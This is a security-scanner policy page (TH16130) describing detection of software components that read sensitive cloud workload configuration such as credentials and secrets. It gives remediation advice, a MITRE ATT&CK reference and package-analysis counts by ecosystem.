TH16130
Detected presence of software components that can access sensitive cloud workload configuration.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
 | pass | high | high | None | None |
About the issueโ
Software components sometimes need to interact with sensitive parts of the runtime environment, often requiring privileged access to accomplish a task. Cloud workload configuration includes high-value information such as cloud provider credentials, environment variables containing secrets, and configuration files used by cloud and container orchestration tools. That information is used by applications running in cloud and containerized environments. Attackers often abuse access to cloud workload configuration to harvest secrets from developer machines and build environments, which can later be exfiltrated to attacker-controlled infrastructure and used to gain unauthorized access to cloud resources. While the presence of code that accesses cloud workload configuration does not necessarily imply malicious intent, all of its uses in a software package should be documented and approved. Only select software components should consider using functions that read cloud workload configuration. One example of acceptable use for such functions is infrastructure-as-code tooling that legitimately needs to read credentials to provision or manage cloud resources on behalf of the developer.
How to resolve the issueโ
- Investigate reported detections as indicators of software tampering.
- Consult Mitre ATT&CK documentation: T1580 - Cloud Infrastructure Discovery.
- Consider rewriting the flagged code without using the marked behaviors.
Incidence statisticsโ
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total amount of packages analyzed
- Linux: 562K
- NPM: 5.12M
- Nuget: 735K
- PS Gallery: 17K
- PyPi: 838K
- RubyGems: 203K
- VS Code: 113K
- Windows: 3.7K
Recommended readingโ
- Cloud Infrastructure Discovery (External resource)